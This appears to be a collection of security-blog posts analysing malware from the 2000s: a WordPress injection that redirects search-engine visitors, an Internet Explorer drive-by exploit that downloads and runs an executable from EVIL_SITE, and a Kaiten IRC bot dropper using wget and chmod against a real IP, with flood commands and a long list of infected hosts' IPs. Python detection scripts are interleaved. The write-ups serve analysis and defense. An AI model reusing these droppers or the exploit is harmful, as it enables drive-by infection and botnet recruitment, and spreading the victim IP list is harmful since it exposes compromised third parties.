WordPress 2.5.0 and 2.5.1 vulnerable to attack

Thanks to co-author Brandon Palmen for the heads-up on a WordPress hack in progress. The attackers are using a few obfuscation tricks to inject code into WordPress installations via a recently announced vulnerability. More details in a well-written write-up here.

The code snippets, from a digitalpoint.com forum thread, use base64 encoding to hide the true redirect destination:


<?php
// Referrer strings the injected code treats as "came from a search engine".
$seref=array("google","msn",
"live","altavista","ask",
"yahoo","aol","cnn",
"weather","alexa");

// Set $ser to "1" when any of those names appears in the Referer header.
$ser=0;
foreach($seref as $ref)
if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }

// Redirect only search-engine visitors that carry no cookies (so never the
// logged-in site owner); the destination host is hidden behind base64.
if($ser=="1" && sizeof($_COOKIE)==0)
{
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
exit;
}
?>

This code shows yet another trend we’ve noticed at stopbadware.org: only exploiting requests that arrive directly from a search engine. We can only conclude this is to prevent (or delay) detection and maximize the duration of the infection.
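A quick way to surface this kind of injection during a cleanup, as an added example rather than code from the post or from the digitalpoint thread: a Python script that decodes every string literal handed straight to base64_decode() in a PHP file, and flags files that combine a Referer check against search-engine names with a Location redirect. The sample input is the snippet above embedded inline; the function names are my own.

```python
import base64
import re

# Names the injected snippet above matches against the Referer header.
SEARCH_ENGINE_HINTS = ("google", "msn", "live", "altavista", "ask",
                       "yahoo", "aol", "cnn", "weather", "alexa")

# Sample input: the injected PHP from the post, embedded so this runs offline.
# A real scan would walk wp-content/ and read each .php file instead.
SAMPLE_PHP = r'''<?php
$seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
$ser=0;
foreach($seref as $ref)
if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0)
{
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
exit;
}
?>'''

# A string literal passed directly to base64_decode().
B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')


def decode_base64_literals(php_source):
    """Return every literal passed straight to base64_decode(), decoded.
    Inputs that are not valid base64 or not printable text are skipped."""
    found = []
    for m in B64_CALL.finditer(php_source):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            found.append(decoded)
    return found


def is_referrer_cloaked_redirect(php_source):
    """True when the file reads the Referer, compares it against search-engine
    names and issues a Location redirect: the cloaking pattern described above."""
    src = php_source.lower()
    reads_referer = "http_referer" in src
    names_search_engine = any(hint in src for hint in SEARCH_ENGINE_HINTS)
    redirects = re.search(r'header\(\s*["\']location:', src) is not None
    return reads_referer and names_search_engine and redirects


def scan(php_source):
    """What a reviewer needs from one file: hidden strings, and whether the
    code conditions its behaviour on the referrer (why owners never see it)."""
    return {
        "hidden_strings": decode_base64_literals(php_source),
        "referrer_cloaked": is_referrer_cloaked_redirect(php_source),
    }


if __name__ == "__main__":
    print(scan(SAMPLE_PHP))
```

Run it over the web root and review every hit by hand. Each test on its own (a base64_decode call, or the word "ask" somewhere in a file) is common in legitimate plugins, which is why the cloaking flag only fires when the referrer check, a search-engine name and the redirect all appear together; a decoded hostname next to that flag is the strong signal.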

Top 2007 Symantec Vulnerabilities


MAY 25, 2006 | eEye Digital Security revealed this afternoon a software vulnerability inside Symantec’s Anti-Virus Corporate Edition 10.0.

According to the warning posted on the vendor’s Upcoming Advisories page, the vulnerability requires no user intervention to exploit and could be used to create a worm. A Symantec representative told Dark Reading that eEye notified Symantec of the problem today and that it is investigating the issue.

Great Reading List on Web Exploits

I was reading up on inet-lux and found a great blog post in Spanish which provides a must-read reference list. I ended up here reading about a Java-based botnet tool I found while researching appeals today. I hope to have more on that later but have not had time to decompile it. Anyone want to donate an IDA Pro license?

[1]:
Microsoft Security Bulletin MS06-014
Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx

Microsoft Security Bulletin MS03-011
Flaw in Microsoft VM Could Enable System Compromise (816093)
http://www.microsoft.com/technet/security/bulletin/ms03-011.mspx

Microsoft Internet Explorer JavaScript Window() Vulnerability:
Microsoft Security Bulletin MS05-054
Cumulative Security Update for Internet Explorer (905915)
http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx

Microsoft Security Bulletin MS06-006
Vulnerability in Windows Media Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564)
http://www.microsoft.com/technet/security/bulletin/ms06-006.mspx

Mozilla Foundation Security Advisory 2005-50
Exploitable crash in InstallVersion.compareTo() (Firefox, Mozilla Suite)
http://www.mozilla.org/security/announce/2005/mfsa2005-50.html

Microsoft Security Advisory (917077)
Vulnerability in the way HTML Objects Handle Unexpected Method Calls Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/917077.mspx

IE ms-its: and mk:@MSITStore: vulnerability:
Microsoft Security Bulletin MS04-013
Cumulative Security Update for Outlook Express (837009)
http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx

[2]:
http://www.enciclopediavirus.com/virus/vervirus.php?id=3456

Source: http://www.rzw.com.ar
___

Internet.HHCtrl.1 Exploit

I’ve enclosed the code in a text box to make reading it a little easier. This code was found on a live site that is using the exploit, via iframes, to infect visitors by drive-by download. Extra br tags are a result of the blog software….

Another variation of drive-by downloaders

The exploit used is fairly old. One other important thing to note is that the CLSID used here is a Microsoft database control.

[zero@day testing]$ curl http://EVIL_SITE/db/wm.htm
<script>
var url,path;
url="http://EVIL_SITE/mc/game/db.exe";
path="C:\\boot.exe";
try{
var ado=(document.createElement("object"));
var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ab="Adodb.";
var cd="Stream";
var g=1;
var as=ado.createobject(ab+cd,"");
var h=1;
xml.Open("GET",url,0);
xml.Send();
as.type=1;
var n=1;
as.open();
as.write(xml.responseBody);
as.savetofile(path,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute(path,"","","open",0);
}
catch(e){}
;</script>
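The split string "Adodb." + "Stream" and the filler lines like var d=1 are there to keep naive signature matches from firing. As an added example (not code from the page, nor from any product), here is a small Python check that collects the script's string variables, folds a+b concatenations passed to createObject, and reports the ProgIDs and CLSIDs that are actually requested. The sample input is the script above embedded inline; the function names are my own.

```python
import re

# Sample input: a copy of the script shown above, embedded so the check runs
# offline (the EVIL_SITE placeholder is kept exactly as it appears on the page).
SAMPLE_JS = r'''
var url,path;
url="http://EVIL_SITE/mc/game/db.exe";
path="C:\\boot.exe";
try{
var ado=(document.createElement("object"));
var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ab="Adodb.";
var cd="Stream";
var g=1;
var as=ado.createobject(ab+cd,"");
var h=1;
xml.Open("GET",url,0);
xml.Send();
as.type=1;
as.open();
as.write(xml.responseBody);
as.savetofile(path,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute(path,"","","open",0);
}
catch(e){}
'''

VAR_ASSIGN = re.compile(r'\bvar\s+(\w+)\s*=\s*"([^"]*)"\s*;')      # var x="lit";
CREATE_CALL = re.compile(r'createobject\(\s*([^,()]+?)\s*,', re.IGNORECASE)
CLASSID = re.compile(r'clsid:([0-9A-Fa-f-]{36})', re.IGNORECASE)

# ProgIDs that, requested together with a save-to-disk call, make up the
# classic download-and-execute chain shown above.
DOWNLOAD_AND_RUN = {"adodb.stream", "shell.application"}


def string_vars(js):
    """Collect every variable that is assigned a plain string literal."""
    return {name: value for name, value in VAR_ASSIGN.findall(js)}


def fold(expr, env):
    """Resolve 'a+b+"lit"' into one string from the collected literals.
    Returns None when any piece is neither a literal nor a known variable."""
    parts = []
    for piece in expr.split("+"):
        piece = piece.strip()
        if len(piece) >= 2 and piece[0] == piece[-1] == '"':
            parts.append(piece[1:-1])
        elif piece in env:
            parts.append(env[piece])
        else:
            return None
    return "".join(parts)


def progids_created(js):
    """ProgIDs passed as the first argument to any createObject call, with
    concatenated fragments folded back together."""
    env = string_vars(js)
    return [fold(arg, env) for arg in CREATE_CALL.findall(js)]


def assess(js):
    """Summary for one script: CLSIDs referenced, ProgIDs requested, and
    whether the download-and-execute combination is present."""
    progids = [p for p in progids_created(js) if p]
    requested = {p.lower() for p in progids}
    return {
        "classids": CLASSID.findall(js),
        "progids": progids,
        "download_and_execute": DOWNLOAD_AND_RUN <= requested
                                and "savetofile" in js.lower(),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_JS))
```

The folding step is deliberately narrow (literals and already-collected variables only), so anything it cannot resolve shows up as None in the ProgID list and deserves a manual look rather than a silent pass.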

Hi, I’m a Mac

And I can get 0wned just like you PC.

* ImageIO

CVE-ID: CVE-2006-3459, CVE-2006-3461, CVE-2006-3462, CVE-2006-3465

Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079

Impact: Viewing a maliciously-crafted TIFF image may lead to an application crash or arbitrary code execution

Description: Buffer overflows were discovered in TIFF tag handling (CVE-2006-3459, CVE-2006-3465), the TIFF PixarLog decoder (CVE-2006-3461), and the TIFF NeXT RLE decoder (CVE-2006-3462). By carefully crafting a corrupt TIFF image, an attacker can trigger a buffer overflow which may lead to an application crash or arbitrary code execution. This update addresses the issue by performing additional validation of TIFF images. Systems prior to Mac OS X v10.4 are affected only by the TIFF NeXT RLE decoder issue (CVE-2006-3462). Credit to Tavis Ormandy, Google Security Team for reporting this issue.

Note: A fifth issue discovered by Tavis Ormandy, CVE-2006-3460, does not affect Mac OS X.

* OpenSSH

CVE-ID: CVE-2006-0393

Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079

Impact: When remote login is enabled, remote attackers may cause a denial of service or determine whether an account exists

Description: Attempting to log in to an OpenSSH server (“Remote Login”) using a nonexistent account causes the authentication process to hang. An attacker can exploit this behavior to detect the existence of a particular account. A large number of such attempts may lead to a denial of service. This update addresses the issue by properly handling attempted logins by nonexistent users. This issue does not affect systems prior to Mac OS X v10.4. Credit to Rob Middleton of the Centenary Institute (Sydney, Australia) for reporting this issue.

More attacks on my web server [Elf Kaiten.AQ]

This one is the same as the last one, which was based on Mambo (an open-source CMS). This time I was able to pull the files down in time.
EDIT: More information here
documented by enkrypted

UPDATE: Secunia reports this as Elf Kaiten.AQ
TrendMicro reports the trojan, but the statistics are horribly wrong. Just the channel I’m monitoring alone has seen hundreds of infections via Mambo.

wget 72.18.195.161/lnikon

This leads to a small script which executes the following:
cd /tmp
mkdir .font-jix
cd .font-jix
wget 72.18.195.161/linux-kernel
chmod +x linux-kernel
./linux-kernel
cd /tmp
cd .font-jix
wget 72.18.195.161/linux-mkdir
chmod +x linux-mkdir
./linux-mkdir

I won’t paste the strings output from the files here, but suffice it to say it’s headed toward an IRC server. I did find these servers listed:
67.43.234.119
 irc.newchrousty.org
 Sympatico.Qc.Ca.NewChrousty.org
 Trois-Rivieres.Qc.Ca.NewChrousty.org
 Chat.NewChrousty.Org
 Micro-ISP.NewChrousty.Org
 LaLiPuS.NewChrousty.Org

Some other interesting strings:
NOTICE %s :PAN
NOTICE %s :Panning %s.
NOTICE %s :TSUNAMI
NOTICE %s :Tsunami heading for %s.
NOTICE %s :What kind of subnet address is that? Do something like: 169.40
NOTICE %s :TSUNAMI = Special packeter that wont be blocked by most firewalls
NOTICE %s :PAN = An advanced syn flooder that will kill most network drivers
NOTICE %s :UDP = A udp flooder
NOTICE %s :UNKNOWN = Another non-spoof udp flooder
NOTICE %s :NICK = Changes the nick of the client
NOTICE %s :SERVER = Changes servers
NOTICE %s :GETSPOOFS = Gets the current spoofing
NOTICE %s :SPOOFS = Changes spoofing to a subnet
NOTICE %s :DISABLE = Disables all packeting from this client
NOTICE %s :ENABLE = Enables all packeting from this client
NOTICE %s :KILL = Kills the client
NOTICE %s :GET = Downloads a file off the web and saves it onto the hd
NOTICE %s :VERSION = Requests version of client
NOTICE %s :KILLALL = Kills all current packeting
NOTICE %s :HELP = Displays this
NOTICE %s :IRC = Sends this command to the server
NOTICE %s :SH = Executes a command

UPDATE: Everything goes to a channel called #mambolizo with password ‘leet’.
Here is a sample of infected IPs:

#mambolizo AUSTI H ~KVDJQ@81.192.114.78 (ZVYRRUU)
#mambolizo AXEUGVS H ~RUSC@80.71.219.42 (NUVQT)
#mambolizo AZBCPAT H ~QTBQJGAH@217.126.24.185 (LVNVG)
#mambolizo Aarh H ~discern@63.89.31.130 (silenc)
#mambolizo Aarhu H ~sett@63.89.31.130 (chef)
#mambolizo Aarhus H ~psych@63.89.31.130 (Aarhus)
#mambolizo BDMIO H ~EHKFTIRL@81.15.157.171 (DJVB)
#mambolizo BEUKTL H ~WCBJMEWJ@81.223.209.211 (EHTSVU)
#mambolizo BFFENJ H ~HZTMPV@217.157.235.41 (KWTE)
#mambolizo BFJEK H ~TFPS@213.55.30.241 (AZOSUKK)
#mambolizo BGYUO H ~QLOJD@193.157.66.96 (HJCRMV)
#mambolizo BLFDWBC H ~IGNYV@69.60.124.43 (UIQP)
#mambolizo BLMWK H ~PFWTCHIQ@202.155.6.237 (LAZYZN)
#mambolizo BMJQF H  network at 68.51.46.205 (UNSRD)
#mambolizo BPIJ H ~AWWLXM@202.83.174.36 (PMTFK)
#mambolizo BPPTPSN H ~ALCTDEWH@85.17.6.163 (YXQDAYQ)
#mambolizo BUXL H ~FBGNOOO@68.189.182.37 (VCGZ)
#mambolizo BXXMOK H ~ZBDKNNE@202.129.46.90 (GSWTDH)
#mambolizo CAHI H ~MTCSU@129.105.249.208 (JMLZ)
#mambolizo CAIZFQV H ~QPRM@82.165.177.236 (FODPLD)
#mambolizo CBZYU H ~AFBZKZ@85.20.35.66 (PFBBQXJR)
#mambolizo CCMLG H ~QSZKPUD@194.106.17.163 (DGLJLZD)
#mambolizo CCQPE H ~RELLEXA@61.220.191.21 (NTLI)
#mambolizo CCQRYBDM H ~FGHQRKAZ@24.63.215.68 (KFYBYOPR)
#mambolizo CDDDJBKB H ~DHXFP@201.217.215.66 (SWCVII)
#mambolizo CFGXYWV H ~THCRIR@85.124.118.43 (GFDWO)
#mambolizo CHABLA H ~XFGRR@193.157.66.96 (JDXK)
#mambolizo CHDQT H ~YUVWLSI@62.90.45.58 (BVLS)
#mambolizo CIUKSB H ~IGYF@207.170.12.72 (WUJHUJSG)
#mambolizo CLOAVSF H ~KPILEJS@213.55.30.241 (FPTVTLKI)
#mambolizo CLSA H ~ARZIVGWJ@24.63.215.68 (XXPG)
#mambolizo CTEM H ~VCDHTEE@130.234.7.72 (HKHTFIA)
#mambolizo CUKXSY H ~SDZLBNG@193.95.249.225 (JLGZS)
#mambolizo CUPKX H ~SIIEQCX@201.224.164.91 (LLVKOKO)
#mambolizo CWYKTNJ H ~QVPP@61.178.85.114 (BXUPLXM)
#mambolizo CXOWBXKI H ~ZJPVHC@213.55.30.241 (QZJP)
#mambolizo CZZPVI H ~JMCL@68.143.64.178 (HFQWJH)
#mambolizo DANMLPKU H ~JMGVKQ@61.220.191.9 (WGCJWERN)
#mambolizo DATECLLS H  www-data at 217.126.49.173 (XQHI)
#mambolizo DBBHZ H ~NTUT@203.55.23.51 (FTOMOL)
#mambolizo DIJZMBU H ~RECI@196.209.16.57 (KJTY)
#mambolizo DIKOUW H ~WVRFYL@24.28.88.134 (VKVLXCSJ)
#mambolizo DLIWY H  www-data at 62.94.123.42 (QPZN)
#mambolizo DOWC H ~ZVJL@213.55.30.241 (OPKSJ)
#mambolizo DRKGEP H ~QRYV@69.40.247.160 (RAEGOPKP)
#mambolizo DYFTYUG H ~GGDRNI@213.225.48.85 (GBVJOKOF)
#mambolizo DYZDB H ~CNLNG@193.157.66.96 (GDVKBW)
#mambolizo DZFZOVII H ~VSHPVG@84.170.216.17 (JHXUMND)
#mambolizo DZRU H ~JXCHPQX@202.143.173.83 (JRIRFKAJ)
#mambolizo EAISZOUV H  hidden-use at 163.21.50.253 (ZWQPAHN)
#mambolizo EARBYA H ~DEIF@130.13.141.109 (EIRJLAMR)
#mambolizo EARBYG H ~TPRULQW@213.243.33.117 (XJDI)
#mambolizo EGTE H ~RWBHQPDH@218.226.219.50 (LNIK)
#mambolizo ELTKP H ~ZEDEQK@83.30.227.15 (NNUKQM)
#mambolizo EMJD H ~BPLL@83.133.81.92 (FIARDNC)
#mambolizo EQBPZKH H ~JELWXQG@67.161.213.233 (HYDRCKDU)
#mambolizo EQPL H ~JJXJ@202.143.101.131 (DNHJQW)
#mambolizo FCWJE H ~JQLN@203.172.129.2 (VNSFD)
#mambolizo FGPBYTK H ~YJOKZQ@203.55.23.201 (PIKEA)
#mambolizo FGPBYTK H ~YJOKZQ@203.55.23.51 (PIKEA)
#mambolizo FKTN H ~FENLCJWQ@194.106.17.163 (FQWXA)
#mambolizo FPQXF H ~KOGHXI@81.223.209.211 (HMDH)
#mambolizo FUDJ H ~LDKVXAK@208.200.133.2 (GCDVMC)
#mambolizo GDBUUEX H ~VKOK@217.149.127.14 (FHFKBT)
#mambolizo GDBYKPKT H ~FCVFJCOB@69.60.124.43 (LGITHJ)
#mambolizo GDZJWT H ~OVFVDTWX@84.57.40.96 (YFXKHJ)
#mambolizo GEQNJVP H ~LILIWKOF@213.243.33.117 (EGMHFA)
#mambolizo GGCBZ H ~AOLZC@140.113.214.180 (CWAB)
#mambolizo GJATO H ~QSEK@82.151.192.61 (AGQPV)
#mambolizo GKHJX H ~WFXYXSI@201.135.134.24 (CTYSG)
#mambolizo GLUGHMP H ~LTDVBWSE@130.94.124.180 (FBWJ)
#mambolizo GOTTSJXC H ~MICTUNNR@61.183.207.183 (NFPBHG)
#mambolizo GUAOBGG H ~MKVQSWY@147.123.155.1 (CMSRZ)
#mambolizo GUYW H ~PAGXEM@67.53.244.228 (XTIN)
#mambolizo GXVAAI H ~VMPX@81.185.145.216 (AVTYXUBA)
#mambolizo GZHEFEG H ~LMVQXFJF@61.183.207.183 (NUNDDSEG)
#mambolizo HAZBZF H ~TSPKOA@202.51.31.246 (IQIKO)
#mambolizo HFPSGS H ~BZMUKKGZ@66.77.26.70 (GLKAKIC)
#mambolizo HYHHWVZ H ~PJBGTB@151.42.226.237 (YASI)
#mambolizo IAMARBMY H ~XTEKZPG@210.173.173.29 (XJNJIYOD)
#mambolizo ICIPEYX H ~PVEBNWFZ@217.126.233.168 (ABUTYCLZ)
#mambolizo ICJQTBW H ~LAKULZNH@206.248.136.95 (AXTOOZY)
#mambolizo IJBTV H ~COZRLFS@83.18.171.82 (ISALRYV)
#mambolizo IKJAJ H ~DPGY@201.102.71.14 (CAJMCB)
#mambolizo IOUEJS H ~PKVY@201.135.134.24 (FEGH)
#mambolizo IVOCSE H ~QPLT@82.149.166.130 (JZWLWXG)
#mambolizo IWJCB H ~TFDKHNL@81.235.163.148 (TWNSMVC)
#mambolizo JFKDMPW H ~PRWEH@149.156.5.206 (TLUWXDR)
#mambolizo JGQCU H ~YYMEHSAP@217.194.97.70 (SZEJFKNQ)
#mambolizo JSUVEF H ~XWCUGCY@83.18.171.82 (TYOVFQH)
#mambolizo JTGX H ~WRTL@65.75.138.190 (RNFX)
#mambolizo KAJXDC H ~XUPPT@213.169.62.179 (TWSP)
#mambolizo KARLYLG H ~OXHGW@69.60.124.43 (AHQJPJB)
#mambolizo KEMP H ~FDCL@80.32.194.218 (RYXZDOFZ)
#mambolizo KENLHRT H ~SKGU@219.117.251.138 (MFXC)
#mambolizo KJUFOM H ~ZCNFYM@82.226.252.2 (FQCMBT)
#mambolizo KNMH H ~UCSYGE@203.125.140.52 (NXOSOEM)
#mambolizo KOZPTXL H ~LQROMHV@209.200.14.230 (PZNP)
#mambolizo KUBVHXA H ~RVOKD@202.155.108.36 (OOCQBL)
#mambolizo KVNE H ~FYZCCF@69.159.203.110 (XTCRZ)
#mambolizo LCVNCLWI H ~CYCBXJM@203.219.147.14 (PSCRO)
#mambolizo LJBNJPR H ~YYFQIM@194.106.17.163 (ORKU)
#mambolizo LKQOBCR H ~UFCAXS@83.109.10.152 (FDQXQ)
#mambolizo LMXMHIL H ~PAMUKHBU@84.157.157.8 (DRTX)
#mambolizo LUMI H ~DUSGPLUQ@61.178.85.114 (XLCDPC)
#mambolizo LWNPI H ~XKDFDUFZ@83.133.81.92 (VBUPE)
#mambolizo MDSZWP H ~KOFUXKDT@64.146.134.133 (AMLM)
#mambolizo MNJVN H ~KPPEKY@65.204.137.200 (FRTRJRX)
#mambolizo MNLTYGNB H ~DZOEL@85.53.64.206 (IMQTC)
#mambolizo MQOFNW H ~GZGC@66.77.26.70 (RVBZQMCR)
#mambolizo MSQQKO H ~GZVTAMV@209.200.14.230 (XZXWNV)
#mambolizo MUVF H ~RAPR@202.172.54.61 (KCMSZSAP)
#mambolizo NDVC H ~IDIY@207.225.61.10 (AERF)
#mambolizo NFRC H ~JZBF@80.34.96.60 (BVFMEPT)
#mambolizo NHGZ H ~HSOOIPV@195.117.103.58 (HARGJ)
#mambolizo NNCXJJUD H ~ULST@81.241.202.21 (FLDSMSFH)
#mambolizo NOBMQ H ~GMHFK@69.64.49.62 (PWPRV)
#mambolizo NQQG H ~NOUP@66.77.26.70 (LMYTO)
#mambolizo NQUUBED H ~SSTLZW@81.223.209.211 (RGAOYT)
#mambolizo NSFCMC H ~EMVAI@203.55.23.201 (VHGIDT)
#mambolizo NSFCMC H ~EMVAI@203.55.23.51 (VHGIDT)
#mambolizo OHIJSLD H ~RKFDPEQ@217.194.97.70 (XDZP)
#mambolizo OKMBMPZH H ~CGYYJU@213.55.30.241 (EJPRHUP)
#mambolizo OOZGM H ~RMWD@84.87.219.36 (UMRTUVJ)
#mambolizo OQBIPNE H ~FRBI@12.36.175.159 (HLNUXRE)
#mambolizo OSUFFLN H ~CDWR@81.57.87.84 (SSFILJM)
#mambolizo OWWX H ~PYSCZ@66.160.135.87 (SEEG)
#mambolizo OXBQOHG H ~ESDIGP@195.117.179.10 (IRMB)
#mambolizo OYXU H ~RLCKXFI@193.170.41.50 (VYBMH)
#mambolizo OZAW H ~EEARLYDZ@194.144.126.233 (GFQVEZ)
#mambolizo PESOQIV H ~QBETMCB@82.236.226.54 (VFPMBQRE)
#mambolizo PFJOZ H ~ZLPNODPB@141.21.7.60 (VDIW)
#mambolizo PFVHK H ~PFGR@217.206.217.199 (XXIO)
#mambolizo PHQWJN H ~SSNITPJ@203.55.23.201 (KOZVB)
#mambolizo PVZB H ~EHDJJNT@82.226.118.139 (KRMNB)
#mambolizo PZAHGJI H ~MDVPQJV@202.143.173.83 (BYTLFC)
#mambolizo QBUITDX H ~DZOEL@85.53.64.206 (IMQTC)
#mambolizo QDCNYMS H ~HFXJM@64.242.180.2 (JSNAOR)
#mambolizo QNHPC H  www-data at 149.156.124.6 (GWTJQULB)
#mambolizo QUENMWN H ~BFKTK@24.31.6.188 (MQQV)
#mambolizo QYUEMXD H ~TAIK@213.54.172.75 (YSZEWBU)
#mambolizo QYUEMXD H ~TAIK@85.212.30.189 (YSZEWBU)
#mambolizo RAOBFQ H ~SBYWMC@61.7.147.47 (YPVFVERO)
#mambolizo RBOVLKIT H ~ZKGEC@81.209.59.194 (HKEXGZ)
#mambolizo RBXWI H ~OPVPGPU@217.170.13.48 (VPWRI)
#mambolizo RCPQMAKE H ~EEGGOQ@213.228.166.47 (BAFQV)
#mambolizo RDHFDU H ~ITBNE@82.155.145.235 (XYKWRWKZ)
#mambolizo RGDFZTMA H ~ZVZKTVVL@64.76.81.153 (FCQZ)
#mambolizo RJOWRVQB H ~NBJH@193.68.47.28 (ONOFS)
#mambolizo RMOSO H ~QOVPYK@201.17.175.51 (MHRRMUB)
#mambolizo ROWA H ~WJNHEAIZ@130.94.124.180 (CSETK)
#mambolizo RQYEFCO H ~PRGHXC@80.32.194.218 (XFBCC)
#mambolizo RSYGMGNZ H ~PUAQLO@193.40.142.254 (GUAD)
#mambolizo RUJG H ~ACVZ@68.189.182.37 (FLTABBA)
#mambolizo RXBV H ~MZUW@217.227.216.244 (AFVWDV)
#mambolizo RXBV H ~MZUW@217.227.226.182 (AFVWDV)
#mambolizo RZYDFBT H ~SGEOXUL@217.170.13.48 (NOPBQH)
#mambolizo SAURG H ~FDKKWST@193.170.41.50 (VHKN)
#mambolizo SBUXGR H ~AOLZC@140.113.214.180 (CWAB)
#mambolizo SCLT H ~TIQCMYV@217.206.217.199 (KHXRV)
#mambolizo SDXL H ~YMJVN@194.210.98.160 (XMCLL)
#mambolizo SEVRKJE H ~DNPT@83.28.39.209 (CUUPNS)
#mambolizo SEXWCEP H ~CRZBRIS@194.242.112.72 (EFUV)
#mambolizo SGLVRMEC H  hidden-use at 163.21.50.253 (RJLCLPZH)
#mambolizo SHDEMF H ~ODWMB@217.194.97.70 (YBMJJ)
#mambolizo SKAZE H ~EPCVZOKX@218.208.118.66 (SALC)
#mambolizo SKFIJTQ H ~VQFM@217.194.97.70 (QTXSSIWL)
#mambolizo SLBV H ~UDCWYGU@141.21.7.60 (NWESN)
#mambolizo SNJJRJNW H ~AYMTX@84.157.129.23 (GEDSORSY)
#mambolizo SNJJRJNW H ~AYMTX@84.157.197.113 (GEDSORSY)
#mambolizo SNUK H ~KTACK@209.200.14.230 (RYCBPV)
#mambolizo SPDR H ~GJOTW@209.172.33.199 (BZSAJMBC)
#mambolizo SSCDAPCS H ~FBBCYTAU@61.178.85.114 (VHALHLC)
#mambolizo SSQGHMH H ~VJVO@87.78.22.107 (MIPBN)
#mambolizo SSSZEAD H ~VAHAR@213.225.48.85 (YEAQJL)
#mambolizo TCJJXJ H ~TFPS@62.217.143.90 (AZOSUKK)
#mambolizo TCJS H ~PIHOXNG@196.28.49.199 (JXUMUDP)
#mambolizo TDMVTPAQ H ~MXRRVGGE@82.165.37.165 (BARPIQB)
#mambolizo TDUQZKXN H ~XAPAFYDJ@209.216.245.146 (PVOOD)
#mambolizo TEYTUIAP H ~YVFF@81.190.195.44 (EVLVIVRP)
#mambolizo TFNX H ~RSQPBS@82.151.192.61 (RSKLC)
#mambolizo THAQRBF H ~PQXZMFG@84.157.157.8 (OSXP)
#mambolizo TKFWFFW H ~GOPC@147.123.155.1 (MVQNLUW)
#mambolizo TKRKMOWV H ~AMFVAX@213.55.30.241 (CRJO)
#mambolizo TMEAMDQ H ~NTBMC@201.252.133.28 (EOVXNYS)
#mambolizo TMKUCU H ~MDAPF@202.143.162.98 (DUQANROU)
#mambolizo TOFQVCBJ H ~ZSKUYBYN@84.149.127.173 (YMUPV)
#mambolizo TOFQVCBJ H ~ZSKUYBYN@84.149.95.234 (YMUPV)
#mambolizo TPMIJD H ~YGUFM@130.94.124.180 (IBVJLDOI)
#mambolizo TRBTSS H ~AHMT@84.19.188.50 (FHTYM)
#mambolizo TROPYYWG H ~NZWO@203.55.23.201 (ABATV)
#mambolizo TUCJQB H ~PQZWTXZ@83.18.171.82 (EGVFI)
#mambolizo TXJRS H ~AGFHDY@67.161.213.233 (KYDT)
#mambolizo UBAG H ~MIKSLQWA@69.56.145.164 (IYUL)
#mambolizo UDEBAS H ~BFWLLE@217.157.235.41 (EOJDZU)
#mambolizo UGMNX H ~PVJKLW@203.55.23.201 (ANWOSOAK)
#mambolizo UGMNX H ~PVJKLW@203.55.23.51 (ANWOSOAK)
#mambolizo ULOV H ~PJOHXM@64.8.101.98 (IHFAMPE)
#mambolizo UMBAVBD H ~PULOQIE@201.135.134.24 (VYDWNXFO)
#mambolizo UPJREYD H ~WQUG@203.214.54.20 (ELEWRN)
#mambolizo UVPTWOUH H ~DZWC@147.102.101.91 (ESVQ)
#mambolizo VAZY H ~QPXYKO@203.55.23.51 (GMAIMGYH)
#mambolizo VDWD H ~CXRCMW@68.18.93.131 (MSOZRSR)
#mambolizo VEMQW H ~OGAZRKS@130.94.124.180 (FMALIBDI)
#mambolizo VFKRTQK H ~CPUYPZV@69.40.247.160 (BWFQ)
#mambolizo VKYPGN H ~RVTRABT@193.157.66.96 (JFVEWAPY)
#mambolizo VNPE H ~TFTH@213.55.30.241 (CFXTI)
#mambolizo VVPGC H ~VPGL@82.151.199.57 (SEDXUJTO)
#mambolizo VYPUVJJ H  apache at 148.244.169.141 (BCTF)
#mambolizo VZBQBK H ~DMZJJKEN@69.196.142.78 (DYPMFCGI)
#mambolizo WEANO H ~PCXCXWEG@83.18.171.82 (CWNVDO)
#mambolizo WKFJYXMW H ~WWBB@212.98.165.220 (HQSKN)
#mambolizo WQYEGXY H ~TIUSRLG@83.133.81.92 (KXCFM)
#mambolizo WSIJLO H ~BIXU@130.94.124.180 (YCUQQHZ)
#mambolizo WTPDHZ H ~PUSWTV@69.60.124.43 (TJVPZCLQ)
#mambolizo WVEAKNI H ~PRHBM@204.1.16.2 (ZIJALNH)
#mambolizo WVHQX H ~PZGUAAQD@82.236.226.54 (JFOOWP)
#mambolizo WZHSWZE H ~VWSBA@24.31.6.188 (DWXDOXF)
#mambolizo XACGE H ~PVKI@213.60.56.216 (JTDEML)
#mambolizo XBCYE H ~JSBRQ@193.157.66.96 (CQXQY)
#mambolizo XBGMKWFT H ~XVEJLF@202.172.239.112 (HJUJPF)
#mambolizo XCKHTC H ~VJTSL@219.94.130.26 (DTVGLPGL)
#mambolizo XICWY H ~HBZVYDZY@24.63.215.68 (TKQIVHC)
#mambolizo XNAOKHY H ~UVLH@85.53.64.206 (VPHOIOM)
